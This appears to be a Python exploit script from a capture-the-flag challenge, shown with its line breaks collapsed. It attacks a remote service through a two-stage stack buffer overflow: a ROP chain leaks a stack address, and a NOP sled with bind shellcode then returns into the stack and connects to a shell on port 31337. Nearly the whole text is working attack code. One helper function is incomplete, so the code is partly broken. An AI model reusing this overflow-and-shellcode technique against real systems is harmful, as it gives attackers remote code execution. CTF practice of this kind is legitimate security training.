def string_to_int_array(string): hex_string = string.encode("hex") int_array = [] for byte in ctf.chunks(hex_string,2*4): int_array.append(struct.unpack('i',struct.pack('>i',int(byte, 16)))[0]) return int_array
def get_most_common_bytes(data, block_size): counts = [[0 for i in range(0,256)] for j in range(0,256)] for c in ctf.chunks(data, block_size): for i,d in enumerate(c): val = ord(d) counts[i][val] = counts[i][val] + 1 max_vals = [] for c in counts: max_vals.append(c.index(max(c)))
def main_2stage(): s = ctf.connect(HOST,PORT) # Password? ctf.recv(s) ctf.send(s, '\n') # Doesn't matter ctf.recv(s) # Payload ctf.send(s, 'A' * 0x208) # Buf ctf.send(s, 'B' * 4) # Saved ebp ctf.send(s, return_gadget * 4) # Move the sp up ctf.send(s, send_gadget) ctf.send(s, '\xDE\xAD\xD0\x0D') # just let this process die, we got what we came for ctf.send(s, struct.pack('I', 5)) # fd # A stack addr is going to be here # Then some size (don't care) # Then some flags (dont'care) ctf.send(s, '\n') # Useless output from program ctf.recv(s) # Lets see what's on the stack stack_data = ctf.recv(s, recv_len=4096) # Nice we can see the part of the stack we've been working on # Pull out the address of what we just leaked chunks = ctf.chunks(stack_data, 4, adv=2) for c in chunks: if c == '\xDE\xAD\xD0\x0D': # adv the generator to the addr next(chunks) next(chunks) next(chunks) break leaked_addr = struct.unpack('I', next(chunks))[0] print("Got addr %X" % leaked_addr) bottom_of_original_frame = leaked_addr + 0x1e top_of_original_frame = bottom_of_original_frame - 0x150 print("Bottom of original frame = %X" % bottom_of_original_frame) print("Top of original frame = %X" % top_of_original_frame) s.close() # This process has probably already died by now # Alright lets get some shellcode onto the stack and pop this s = ctf.connect(HOST,PORT) # Password? ctf.recv(s) ctf.send(s, '\n') # Doesn't matter ctf.recv(s) # Payload nop_sled_size=256 + 128 ctf.send(s, '\x90' * nop_sled_size) ctf.send(s, bind_shellcode) ctf.send(s, 'A' * (0x208-len(bind_shellcode)-nop_sled_size)) ctf.send(s, 'B' * 4) # Saved ebp ctf.send(s, struct.pack('I', top_of_original_frame)) # Thank you fork! ctf.send(s, '\n') ctf.shell(HOST, 31337)